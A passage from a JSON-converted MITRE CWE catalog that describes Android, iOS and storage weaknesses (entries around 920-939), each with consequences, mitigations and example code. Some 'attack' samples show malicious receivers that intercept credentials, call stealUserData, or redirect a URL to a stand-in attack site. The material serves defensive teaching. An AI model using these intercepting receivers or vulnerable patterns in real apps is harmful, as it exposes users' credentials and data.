costs.","Normal operation of an application will consume power. However, in some cases, an attacker could cause the application to consume more power than intended, using components such as:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Display","CPU","Disk I/O","GPS","Sound","Microphone","USB interface"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (Other)","DoS: Crash, Exit, or Restart"],"Note":"The power source could be drained, causing the application - and the entire device - to cease functioning."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-11"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"921":{"attr":{"@_ID":"921","@_Name":"Storage of Sensitive Data in a Mechanism without Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores sensitive information in a file system or device that does not have built-in access control.","Extended_Description":{"xhtml:p":["While many modern file systems or devices utilize some form of access control in order to restrict access to data, not all storage mechanisms have this capability. For example, memory cards, floppy disks, CDs, and USB devices are typically made accessible to any user within the system. This can become a problem when sensitive data is stored in these mechanisms in a multi-user environment, because anybody on the system can read or write this data.","On Android devices, external storage is typically globally readable and writable by other applications on the device. External storage may also be easily accessible through the mobile device\'s USB connection or physically accessible through the device\'s memory card port."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"922","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"Attackers can read sensitive information by accessing the unrestricted storage mechanism."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"Attackers can modify or delete sensitive information by accessing the unrestricted storage mechanism."}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-921"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"922":{"attr":{"@_ID":"922","@_Name":"Insecure Storage of Sensitive Information","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores sensitive information without properly limiting read or write access by unauthorized actors.","Extended_Description":"If read access is not properly restricted, then attackers can steal the sensitive information. If write access is not properly restricted, then attackers can modify and possibly delete the data, causing incorrect results and possibly a denial of service.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"System Configuration"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"Attackers can read sensitive information by accessing the unrestricted storage mechanism."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"Attackers can read sensitive information by accessing the unrestricted storage mechanism."}]},"Notes":{"Note":[{"#text":"There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data.","attr":{"@_Type":"Relationship"}},{"#text":"This is a high-level entry that includes children from various parts of the CWE research view (CWE-1000). Currently, most of the information is in these child entries. This entry will be made more comprehensive in later CWE versions.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-23"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"923":{"attr":{"@_ID":"923","@_Name":"Improper Restriction of Communication Channel to Intended Endpoints","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software establishes a communication channel to (or from) an endpoint for privileged or protected operations, but it does not properly ensure that it is communicating with the correct endpoint.","Extended_Description":{"xhtml:p":["Attackers might be able to spoof the intended endpoint from a different system or process, thus gaining the same level of access as the intended endpoint.","While this issue frequently involves authentication between network-based clients and servers, other types of communication channels and endpoints can have this weakness."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":"Gain Privileges or Assume Identity","Note":"If an attacker can spoof the endpoint, the attacker gains all the privileges that were intended for the original endpoint."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"501"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-23"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Improper Authentication of Endpoint in a Communication Channel","attr":{"@_Date":"2014-02-18"}}}},"924":{"attr":{"@_ID":"924","@_Name":"Improper Enforcement of Message Integrity During Transmission in a Communication Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software establishes a communication channel with an endpoint and receives a message from that endpoint, but it does not sufficiently ensure that the message was not modified during transmission.","Extended_Description":"Attackers might be able to modify the message and spoof the endpoint by interfering with the data as it crosses the network or by redirecting the connection to a system under their control.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":"Gain Privileges or Assume Identity","Note":"If an attackers can spoof the endpoint, the attacker gains all the privileges that were intended for the original endpoint."}},"Notes":{"Note":{"#text":"This entry should be made more comprehensive in later CWE versions, as it is likely an important design flaw that underlies (or chains to) other weaknesses.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-23"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"925":{"attr":{"@_ID":"925","@_Name":"Improper Verification of Intent by Broadcast Receiver","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Android application uses a Broadcast Receiver that receives an Intent but does not properly verify that the Intent came from an authorized source.","Extended_Description":"Certain types of Intents, identified by action string, can only be broadcast by the operating system itself, not by third-party applications. However, when an application registers to receive these implicit system intents, it is also registered to receive any explicit intents. While a malicious application cannot send an implicit system intent, it can send an explicit intent to the target application, which may assume that any received intent is a valid implicit system intent and not an explicit intent from another application. This may lead to unintended behavior.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Intent Spoofing"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Gain Privileges or Assume Identity","Note":"Another application can impersonate the operating system and cause the software to perform an unintended action."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Before acting on the Intent, check the Intent Action to make sure it matches the expected System action."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;manifest package=\\"com.example.vulnerableApplication\\"&gt;&lt;/manifest&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;application&gt;&lt;/application&gt;","xhtml:br":["","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;receiver android:name=\\".ShutdownReceiver\\"&gt;&lt;/receiver&gt;","xhtml:div":{"#text":"&lt;intent-filter&gt;&lt;/intent-filter&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;action android:name=\\"android.intent.action.ACTION_SHUTDOWN\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(Intent.ACTION_SHUTDOWN);BroadcastReceiver sReceiver = new ShutDownReceiver();registerReceiver(sReceiver, filter);public class ShutdownReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"@Overridepublic void onReceive(final Context context, final Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"mainActivity.saveLocalData();mainActivity.stopActivity();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["The ShutdownReceiver class will handle the intent:","Because the method does not confirm that the intent action is the expected system intent, any received intent will trigger the shutdown procedure, as shown here:","An attacker can use this behavior to cause a denial of service."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"499"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-922","@_Section":"3.2.1"}}},"Notes":{"Note":{"#text":"This entry will be made more comprehensive in later CWE versions.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"926":{"attr":{"@_ID":"926","@_Name":"Improper Export of Android Application Components","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Android application exports a component for use by other applications, but does not properly restrict which applications can launch the component or access the data it contains.","Extended_Description":{"xhtml:p":"The attacks and consequences of improperly exporting a component may depend on the exported component:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["If access to an exported Activity is not restricted, any application will be able to launch the activity. This may allow a malicious application to gain access to sensitive information, modify the internal state of the application, or trick a user into interacting with the victim application while believing they are still interacting with the malicious application.","If access to an exported Service is not restricted, any application may start and bind to the Service. Depending on the exposed functionality, this may allow a malicious application to perform unauthorized actions, gain access to sensitive information, or corrupt the internal state of the application.","If access to a Content Provider is not restricted to only the expected applications, then malicious applications might be able to access the sensitive data. Note that in Android before 4.2, the Content Provider is automatically exported unless it has been explicitly declared as NOT exported."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["There are three types of components that can be exported in an Android application.","An Activity is an application component that provides a UI for users to interact with. A typical application will have multiple Activity screens that perform different functions, such as a main Activity screen and a separate settings Activity screen.","A Service is an application component that is started by another component to execute an operation in the background, even after the invoking component is terminated. Services do not have a UI component visible to the user.","The Content Provider mechanism can be used to share data with other applications or internally within the same application."],"xhtml:div":[{"#text":"Activity","attr":{"@_style":"color:#32498D; font-weight:bold;"}},{"#text":"Service","attr":{"@_style":"color:#32498D; font-weight:bold;"}},{"#text":"Content Provider","attr":{"@_style":"color:#32498D; font-weight:bold;"}}]}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":[{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart","DoS: Instability","Varies by Context"],"Note":"Other applications, possibly untrusted, can launch the Activity."},{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","Gain Privileges or Assume Identity","DoS: Crash, Exit, or Restart","DoS: Instability","Varies by Context"],"Note":"Other applications, possibly untrusted, can bind to the Service."},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"],"Note":"Other applications, possibly untrusted, can read or modify the data that is offered by the Content Provider."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Build and Compilation","Strategy":"Attack Surface Reduction","Description":"If they do not need to be shared by other applications, explicitly mark components with android:exported=\\"false\\" in the application manifest."},{"Phase":"Build and Compilation","Strategy":"Attack Surface Reduction","Description":"If you only intend to use exported components between related apps under your control, use android:protectionLevel=\\"signature\\" in the xml manifest to restrict access to applications signed by you."},{"Phase":["Build and Compilation","Architecture and Design"],"Strategy":"Attack Surface Reduction","Description":"Limit Content Provider permissions (read/write) as appropriate."},{"Phase":["Build and Compilation","Architecture and Design"],"Strategy":"Separation of Privilege","Description":"Limit Content Provider permissions (read/write) as appropriate."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This application is exporting an activity and a service in its manifest.xml:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;activity android:name=\\"com.example.vulnerableApp.mainScreen\\"&gt;&lt;/activity&gt;&lt;service android:name=\\"com.example.vulnerableApp.backgroundService\\"&gt;&lt;/service&gt;","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;intent-filter&gt;&lt;/intent-filter&gt;","xhtml:br":["","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"&lt;action android:name=\\"com.example.vulnerableApp.OPEN_UI\\" /&gt;&lt;category android:name=\\"android.intent.category.DEFAULT\\" /&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;intent-filter&gt;&lt;/intent-filter&gt;","xhtml:br":["","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"&lt;action android:name=\\"com.example.vulnerableApp.START_BACKGROUND\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":""}},"Body_Text":"Because these components have intent filters but have not explicitly set \'android:exported=false\' elsewhere in the manifest, they are automatically exported so that any other application can launch them. This may lead to unintended behavior or exploits."},{"Intro_Text":"This application has created a content provider to enable custom search suggestions within the application:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;provider&gt;&lt;/provider&gt;","xhtml:div":{"#text":"android:name=\\"com.example.vulnerableApp.searchDB\\"android:authorities=\\"com.example.vulnerableApp.searchDB\\"&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Because this content provider is only intended to be used within the application, it does not need to be exported. However, in Android before 4.2, it is automatically exported thus potentially allowing malicious applications to access sensitive information."}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-923"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-07-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-01-22","Modification_Importance":"Critical","Modification_Comment":"Expanded entry to be more general and include all types of Android components that may be improperly exported."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Improper Restriction of Content Provider Export to Other Applications","attr":{"@_Date":"2014-02-18"}}}},"927":{"attr":{"@_ID":"927","@_Name":"Use of Implicit Intent for Sensitive Communication","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Android application uses an implicit intent for transmitting sensitive data to other applications.","Extended_Description":{"xhtml:p":["Since an implicit intent does not specify a particular application to receive the data, any application can process the intent by using an Intent Filter for that intent. This can allow untrusted applications to obtain sensitive data. There are two variations on the standard broadcast intent, ordered and sticky.","Ordered broadcast intents are delivered to a series of registered receivers in order of priority as declared by the Receivers. A malicious receiver can give itself a high priority and cause a denial of service by stopping the broadcast from propagating further down the chain. There is also the possibility of malicious data modification, as a receiver may also alter the data within the Intent before passing it on to the next receiver. The downstream components have no way of asserting that the data has not been altered earlier in the chain.","Sticky broadcast intents remain accessible after the initial broadcast. An old sticky intent will be broadcast again to any new receivers that register for it in the future, greatly increasing the chances of information exposure over time. Also, sticky broadcasts cannot be protected by permissions that may apply to other kinds of intents.","In addition, any broadcast intent may include a URI that references data that the receiving component does not normally have the privileges to access. The sender of the intent can include special privileges that grant the receiver read or write access to the specific URI included in the intent. A malicious receiver that intercepts this intent will also gain those privileges and be able to read or write the resource at the specified URI."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Other applications, possibly untrusted, can read the data that is offered through the Intent."},{"Scope":"Integrity","Impact":"Varies by Context","Note":"The application may handle responses from untrusted applications on the device, which could cause it to perform unexpected or unauthorized actions."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If the application only requires communication with its own components, then the destination is always known, and an explicit intent could be used."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This application wants to create a user account in several trusted applications using one broadcast intent:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.CreateUser\\");intent.putExtra(\\"Username\\", uname_string);intent.putExtra(\\"Password\\", pw_string);sendBroadcast(intent);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.CreateUser\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);","xhtml:br":["",""]}}],"Body_Text":["This application assumes only the trusted applications will be listening for the action. A malicious application can register for this action and intercept the user\'s login information, as below:","When a broadcast contains sensitive information, create an allowlist of applications that can receive the action using the application\'s manifest file, or programmatically send the intent to each individual intended receiver."]},{"Intro_Text":"This application interfaces with a web service that requires a separate user login. It creates a sticky intent, so that future trusted applications that also use the web service will know who the current user is:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.service.UserExists\\");intent.putExtra(\\"Username\\", uname_string);sendStickyBroadcast(intent);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.service.UserExists\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);","xhtml:br":["",""]}}],"Body_Text":"Sticky broadcasts can be read by any application at any time, and so should never contain sensitive information such as a username."},{"Intro_Text":"This application is sending an ordered broadcast, asking other applications to open a URL:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.OpenURL\\");intent.putExtra(\\"URL_TO_OPEN\\", url_string);sendOrderedBroadcastAsUser(intent);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"public class CallReceiver extends BroadcastReceiver {}","xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"String Url = intent.getStringExtra(Intent.URL_TO_OPEN);attackURL = \\"www.example.com/attack?\\" + Url;setResultData(attackURL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}],"Body_Text":["Any application in the broadcast chain may alter the data within the intent. This malicious application is altering the URL to point to an attack site:","The final receiving application will then open the attack URL. Where possible, send intents to specific trusted applications instead of using a broadcast chain."]},{"attr":{"@_Demonstrative_Example_ID":"DX-108"},"Intro_Text":"This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.BackupUserData\\");intent.setData(file_uri);intent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);sendBroadcast(intent);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"public class CallReceiver extends BroadcastReceiver {}","xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"Uri userData = intent.getData();stealUserData(userData);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}],"Body_Text":"Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user\'s data."}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-922","@_Section":"3.2.1"}},{"attr":{"@_External_Reference_ID":"REF-923"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-07-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"939":{"attr":{"@_ID":"939","@_Name":"Improper Authorization in Handler for Custom URL Scheme","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a handler for a custom URL scheme, but it does not properly restrict which actors can invoke the handler using the scheme.","Extended_Description":"Mobile platforms and other architectures allow the use of custom URL schemes to facilitate communication between applications. In the case of iOS, this is the only method to do inter-application communication. The implementation is at the developer\'s discretion which may open security flaws in the application. An example could be potentially dangerous functionality such as modifying files through a custom URL scheme.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":["Utilize a user prompt pop-up to authorize potentially harmful actions such as those modifying data or dealing with sensitive information.","When designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This iOS application uses a custom URL scheme. The replaceFileText action in the URL scheme allows an external application to interface with the file incomingMessage.txt and replace the contents with the text field of the query string.","Body_Text":["External Application","Application URL Handler","The handler has no restriction on who can use its functionality. The handler can be invoked using any method that invokes the URL handler such as the following malicious iframe embedded on a web page opened by Safari.","The attacker can host a malicious website containing the iframe and trick users into going to the site via a crafted phishing email. Since Safari automatically executes iframes, the user is not prompted when the handler executes the iframe code which automatically invokes the URL handler replacing the bookmarks file with a list of malicious websites. Since replaceFileText is a potentially dangerous action, an action that modifies data, there should be a sanity check before the writeToFile:withText: function."],"Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Objective-C"},"xhtml:div":{"#text":"NSString *stringURL = @\\"appscheme://replaceFileText?file=incomingMessage.txt&amp;text=hello\\";NSURL *url = [NSURL URLWithString:stringURL];[[UIApplication sharedApplication] openURL:url];","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"- (BOOL)application:(UIApplication *)application handleOpenURL:(NSURL *)url {}","xhtml:br":"","xhtml:div":{"#text":"if (!url) {}NSString *action = [url host];if([action isEqualToString: @\\"replaceFileText\\"]) {}return YES;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return NO;","attr":{"@_style":"margin-left:10px;"}},{"#text":"NSDictionary *dict = [self parseQueryStringExampleFunction:[url query]];FileObject *objectFile = [self writeToFile:[dict objectForKey: @\\"file\\"] withText:[dict objectForKey: @\\"text\\"]];","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//this function will write contents to a specified 